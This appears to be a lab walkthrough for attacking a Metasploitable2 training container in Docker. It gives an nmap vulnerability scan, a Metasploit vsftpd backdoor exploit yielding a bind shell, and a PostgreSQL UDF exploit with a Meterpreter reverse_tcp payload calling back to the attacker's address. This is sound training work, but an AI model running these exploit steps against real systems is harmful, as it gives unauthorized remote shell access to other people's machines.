Metasploitable 2

Start Metasploitable2

If you haven't setup metasploitable2 yet you can follow my steps in the chapter Docker basics and Images.

docker ps -a

docker start meta2

docker ps

docker exec -it meta2 /bin/bash

hostname -i

nmap vulnerability scan

sudo nmap -T5 -Pn -n -v -sS -sV --script "vuln OR default" --open -oA ./vulscan_nmap_meta2 172.17.0.2

Wait until scan is finished:

xsltproc vulscan_nmap_meta2.xml -o vulscan_nmap_meta2.html

Exploit vsftpd service

searchsploit vsftpd

msfconsole

search vsftpd

use 0

set rhost 172.17.0.2

exploit

We have a bindshell:

Exploit postgresSQL

From the vulnerability report we can see that a postgresSQL Service is running on the target system.

Let's enumerate the PostgresSQL Version of our target:

use auxiliary/scanner/postgres/postgres_version

set rhosts 172.17.0.2

exploit

search postgres

use 13

info

Description: On some default Linux installations of PostgreSQL, the postgres service account may write to the /tmp directory, and may source UDF Shared Libraries from there as well, allowing execution of arbitrary code. This module compiles a Linux shared object file, uploads it to the target host via the UPDATE pg_largeobject method of binary injection, and creates a UDF (user defined function) from that shared object. Because the payload is run as the shared object's constructor, it does not need to conform to specific Postgres API versions.

set lhost 172.17.0.1

set rhost 172.17.0.2

(We leave the default payload --> linux/x86/meterpreter/reverse_tcp)

exploit -j

sessions

sessions -i 3